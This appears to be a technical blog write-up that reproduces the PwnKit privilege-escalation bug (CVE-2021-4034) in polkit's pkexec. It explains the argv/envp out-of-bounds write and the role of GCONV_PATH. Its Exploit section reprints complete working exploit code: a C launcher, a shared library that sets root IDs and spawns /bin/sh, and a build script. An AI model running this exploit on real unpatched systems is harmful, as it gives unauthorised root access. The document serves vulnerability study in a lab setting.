Background
I reproduced this vulnerability because it is quite interesting: it takes advantage of an out-of-bounds write and turns it into a vector for privilege escalation.
Moreover, after reading some articles, two questions remained in my mind:
- Why can’t we set LD_PRELOAD to get command execution? Many attackers use this technique to bypass disabled functions in PHP.
- If LD_PRELOAD cannot be used, why can GCONV_PATH? Why can’t other sensitive environment variables be used? What makes it unique?
Though a few articles touch the surface of these two questions, none of them gives a comprehensive answer.
Therefore, with these two questions in mind, I started my journey to reproduce this vulnerability.
Reproduction Environment
There is an existing Docker image for this issue created by “chenaotian”: https://hub.docker.com/r/chenaotian/cve-2021-4034
Therefore, we can use it directly.
docker run -d -ti --rm -h cvedebug --name cvedebug --cap-add=SYS_PTRACE chenaotian/cve-2021-4034:latest /bin/bash
docker exec -it cvedebug /bin/bash
cd ~
ls
What is good about this image is that it also contains a debugger.
Vulnerability Analysis
Many articles do a great job on this part, so I will go over it in the most straightforward way.
“pkexec allows an authorized user to execute PROGRAM as another user. If username is not specified, then the program will be executed as the administrative super user, root.”
pkexec has its SUID bit set.
The argument-processing logic starts at line 533 of pkexec.c:
https://github.com/wingo/polkit/blob/master/src/programs/pkexec.c
n is initialized to 1, and the program uses argv[n] to fetch the first argument.
This is a common approach, because argv[0] is “pkexec” itself when pkexec is launched from the terminal.
gdb /usr/local/bin/pkexec
Reading symbols from /usr/local/bin/pkexec...done.
pwndbg> b main
Breakpoint 1 at 0x1fb0: file pkexec.c, line 387.
pwndbg> r
|---------+---------+-----+------------|---------+---------+-----+------------|
| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] |
|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------|
     V         V                V           V         V                V
 "program" "-option"           NULL      "value" "PATH=name"          NULL
In this run argc is 1, so argv[1] is already past the last real argument, but it holds only the terminating NULL and does not point to anything meaningful. Another notable observation is that the environment variable pointers start at argv[argc+1]. This can also be confirmed in the kernel code that execve() uses to build the initial stack:
// linux5.4/fs/binfmt_elf.c : 163
static int
create_elf_tables(struct linux_binprm *bprm, struct elfhdr *exec,
		unsigned long load_addr, unsigned long interp_load_addr)
{
	...
	sp = STACK_ADD(p, ei_index);
	...
	/* Now, let's put argc (and argv, envp if appropriate) on the stack */
	// argc goes onto the stack
	if (__put_user(argc, sp++))
		return -EFAULT;

	// the argv pointers go onto the stack
	/* Populate list of argv pointers back to argv strings. */
	p = current->mm->arg_end = current->mm->arg_start;
	while (argc-- > 0) {
		size_t len;
		if (__put_user((elf_addr_t)p, sp++))
			return -EFAULT;
		len = strnlen_user((void __user *)p, MAX_ARG_STRLEN);
		if (!len || len > MAX_ARG_STRLEN)
			return -EINVAL;
		p += len;
	}
	// the NULL terminator of argv
	if (__put_user(0, sp++))
		return -EFAULT;
	current->mm->arg_end = p;

	// the envp pointers follow immediately
	/* Populate list of envp pointers back to envp strings. */
	current->mm->env_end = current->mm->env_start = p;
	while (envc-- > 0) {
		size_t len;
		if (__put_user((elf_addr_t)p, sp++))
			return -EFAULT;
		len = strnlen_user((void __user *)p, MAX_ARG_STRLEN);
		if (!len || len > MAX_ARG_STRLEN)
			return -EINVAL;
		p += len;
	}
	// the NULL terminator of envp
	if (__put_user(0, sp++))
		return -EFAULT;
	...
}
But what if pkexec is executed with execve() and argv is explicitly set to { NULL }?
Then argc becomes 0, argv[0] is NULL, and argv[1] points to the first environment variable, envp[0].
On line 609, path is assigned the value of argv[1], which is actually envp[0].
On line 631, s is assigned the absolute path of path, which is found by searching the directories in PATH for that name.
The definition of g_find_program_in_path can be found at https://fossies.org/dox/pkg-config-0.29.2/gutils_8c_source.html#l00298
On line 638, s is written back to argv[1], which is envp[0].
Therefore, we are able to overwrite envp[0] and thereby inject an environment variable of our choosing.
From Qualys:
If our PATH environment variable is “PATH=name”, and if the directory “name” exists (in the current working directory) and contains an executable file named “value”, then a pointer to the string “name/value” is written out-of-bounds to envp[0];
If our PATH is “PATH=name=.”, and if the directory “name=.” exists and contains an executable file named “value”, then a pointer to the string “name=./value” is written out-of-bounds to envp[0].
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
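An example would be:
/* Before running, create a directory named "ABC=." in the current
 * directory, then create an executable file called "test" inside it. */
#include <unistd.h>

int main(void)
{
    char *a_argv[] = { NULL };      /* argc becomes 0 */
    char *a_envp[] = {
        "test",                     /* read by pkexec as argv[1] */
        "PATH=ABC=.",               /* PATH holds the directory "ABC=." */
        NULL
    };
    return execve("/usr/bin/pkexec", a_argv, a_envp);
}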
According to the logic above, envp[0] becomes “ABC=./test”, that is, an environment variable named ABC whose value is ./test.
Why spend so much effort injecting an environment variable?
Why can’t we just pass our crafted environment variable directly to execve()?
This is because, for a SUID program, the dynamic linker ld-linux-x86-64.so.2 removes the sensitive environment variables at startup.
# _dl_non_dynamic_init: glibc-2.27/elf/dl-support.c : 307
void
_dl_non_dynamic_init (void)
{
  ··· ···
  ··· ···
  if (__libc_enable_secure) // when the SUID bit is set
    {
      static const char unsecure_envvars[] =
        UNSECURE_ENVVARS
#ifdef EXTRA_UNSECURE_ENVVARS
        EXTRA_UNSECURE_ENVVARS
#endif
        ;
      const char *cp = unsecure_envvars;
      // unset all unsecure environment variables
      while (cp < unsecure_envvars + sizeof (unsecure_envvars))
        {
          __unsetenv (cp);
          cp = (const char *) __rawmemchr (cp, '\0') + 1;
        }
#if !HAVE_TUNABLES
      if (__access ("/etc/suid-debug", F_OK) != 0)
        __unsetenv ("MALLOC_CHECK_");
#endif
    }
  ··· ···
  ··· ···
}
# glibc-2.27/sysdeps/generic/unsecvars.h : 10
#define GLIBC_TUNABLES_ENVVAR "GLIBC_TUNABLES\0"
#define UNSECURE_ENVVARS \
"GCONV_PATH\0" \
"GETCONF_DIR\0" \
GLIBC_TUNABLES_ENVVAR \
"HOSTALIASES\0" \
"LD_AUDIT\0" \
"LD_DEBUG\0" \
"LD_DEBUG_OUTPUT\0" \
"LD_DYNAMIC_WEAK\0" \
"LD_HWCAP_MASK\0" \
"LD_LIBRARY_PATH\0" \
"LD_ORIGIN_PATH\0" \
"LD_PRELOAD\0" \
"LD_PROFILE\0" \
"LD_SHOW_AUXV\0" \
"LD_USE_LOAD_BIAS\0" \
"LOCALDOMAIN\0" \
"LOCPATH\0" \
"MALLOC_TRACE\0" \
"NIS_PATH\0" \
"NLSPATH\0" \
"RESOLV_HOST_CONF\0" \
"RES_OPTIONS\0" \
"TMPDIR\0" \
"TZDIR\0"
Exploit
The g_printerr() function is used several times in pkexec. If the environment variable CHARSET is not UTF-8, g_printerr() will call glibc’s iconv_open() to convert the message from UTF-8 to another charset.
The iconv_open() function returns a conversion descriptor that converts a sequence of characters from encoding fromcode to encoding tocode. The conversion descriptor holds the conversion state. The conversion routines for each character set are stored in a .so file, and iconv_open() follows the entries in the gconv-modules file to load the .so file that corresponds to the requested encodings. If the environment variable GCONV_PATH is present, iconv_open() looks for the gconv-modules file under GCONV_PATH, and the subsequent steps remain unchanged.
Therefore, what remains is to find a way to trigger iconv_open().
Fortunately, pkexec has a function called validate_environment_variable().
It shows that if a variable named “SHELL” or “XAUTHORITY” carries a value that fails validation, g_printerr() is triggered.
Knowing all of the above, the following exploit is easy to understand:
(the code is from https://github.com/chenaotian/CVE-2021-4034)
# exp.c
#include <stdio.h>
#include <unistd.h>
int main(int argc, char **argv)
{
    char * const a_argv[] = { NULL };
    char * const a_envp[] = {
        "pwnkitdir",
        "PATH=GCONV_PATH=.",
        "CHARSET=PWNKIT",
        "SHELL=xxx",
        NULL
    };
    execve("/usr/local/bin/pkexec", a_argv, a_envp);
}
# lib.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
static void __attribute__ ((constructor)) exp(void);
static void exp(void)
{
    setuid(0); seteuid(0); setgid(0); setegid(0);
    static char *a_argv[] = { "sh", NULL };
    static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
    execve("/bin/sh", a_argv, a_envp);
}
# run.sh
mkdir 'GCONV_PATH=.'
touch 'GCONV_PATH=./pwnkitdir'
chmod 777 'GCONV_PATH=./pwnkitdir'
mkdir pwnkitdir
touch pwnkitdir/gconv-modules
echo "module UTF-8// PWNKIT// pwnkit 1" >> pwnkitdir/gconv-modules
gcc -fPIC -shared lib.c -o pwnkitdir/pwnkit.so
gcc exp.c -o exp
Answers to the First Two Questions
During the reproduction, I found the answers to the first two questions.
Why can’t we set LD_PRELOAD to get command execution? Many attackers use this technique to bypass disabled functions in PHP.
This is because LD_PRELOAD only takes effect at program startup, when the dynamic linker loads libraries before main() runs. Since pkexec’s vulnerability is triggered inside main(), injecting LD_PRELOAD at that point no longer influences the dynamic linker.
Why is it useful for PHP? Because many PHP functions spawn a new process, and LD_PRELOAD takes effect when that new process starts (the child process inherits its parent’s environment).
If LD_PRELOAD cannot be used, why can GCONV_PATH? Why can’t other sensitive environment variables be used? What makes it unique?
GCONV_PATH works for the reason illustrated in the Exploit section: iconv_open() uses this path to find the .so file.
Why does it seem to be the only vector in all exploits?
This is because the environment is sanitized on line 701. The attack must therefore happen after line 638 (where the environment is modified) and before line 701. That is a small window, so GCONV_PATH is probably the only variable that can be hijacked.
References
https://github.com/chenaotian/CVE-2021-4034
https://xz.aliyun.com/t/10905
https://saucer-man.com/information_security/876.html
https://github.com/wingo/polkit/blob/master/src/programs/pkexec.c
https://www.yijinglab.com/specialized/20220222150802
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
http://blog.gamous.cn/post/cve-2021-4034/
https://www.iceswordlab.com/2022/02/10/CVE-2021-4034/